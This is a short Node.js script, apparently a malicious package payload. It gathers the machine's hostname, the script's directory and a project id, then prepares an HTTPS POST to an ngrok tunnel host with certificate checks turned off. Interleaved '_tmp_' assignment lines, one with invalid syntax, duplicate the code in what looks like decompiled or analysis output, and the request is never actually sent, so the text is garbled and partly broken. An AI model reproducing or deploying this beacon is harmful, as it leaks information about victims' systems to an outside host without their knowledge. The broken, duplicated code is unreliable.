const https = require('https')
var os = require("os")
var hostname = os.hostname()
var filepath = path.dirname(__filename)
const data = new TextEncoder().encode(
  JSON.stringify({
    hostname: hostname,
    filepath: filepath,
    project_id: process.argv[2]
  })
)
JSON.stringify({
    hostname: hostname,
    filepath: filepath,
    project_id: process.argv[2]
  })
_tmp_2.hostname = hostname
_tmp_2.filepath = filepath
_tmp_2.project_id = process.argv[2]
const options = {
  hostname: '023b-176-40-230-157.eu.ngrok.io',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}
_tmp_3.hostname = "023b-176-40-230-157.eu.ngrok.io"
_tmp_3.port = 443
_tmp_3.path = "/"
_tmp_3.method = "POST"
_tmp_3.headers = {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  }
_tmp_4.Content-Type = "application/json"
_tmp_4.Content-Length = data.length
_tmp_3.rejectUnauthorized = false
const req = https.request(options, res => {})
